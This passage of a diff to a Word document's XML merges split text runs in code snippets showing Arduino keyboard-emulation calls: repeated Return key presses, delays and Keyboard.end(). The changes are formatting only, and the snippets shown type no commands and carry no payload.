-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Keyboard.end(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>);</w:t>
+                        <w:t xml:space="preserve">  Keyboard.end();</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23446,25 +22076,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">void </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>loop(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>) {}</w:t>
+                        <w:t>void loop() {}</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -23551,25 +22163,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23586,25 +22180,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23638,25 +22214,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23673,25 +22231,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23725,25 +22265,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23760,25 +22282,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23812,25 +22316,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23847,25 +22333,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23899,25 +22367,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23934,25 +22384,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -23986,25 +22418,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -24021,25 +22435,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -24073,25 +22469,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -24134,25 +22512,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Keyboard.end(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>);</w:t>
+                              <w:t xml:space="preserve">  Keyboard.end();</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -24222,25 +22582,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24257,25 +22599,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24309,25 +22633,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24344,25 +22650,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24396,25 +22684,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24431,25 +22701,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24483,25 +22735,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24518,25 +22752,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24570,25 +22786,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24605,25 +22803,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24657,25 +22837,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24692,25 +22854,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24744,25 +22888,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -24805,25 +22931,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Keyboard.end(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>);</w:t>
+                        <w:t xml:space="preserve">  Keyboard.end();</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -25193,23 +23301,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t>delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25237,23 +23335,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t>typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25264,23 +23352,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
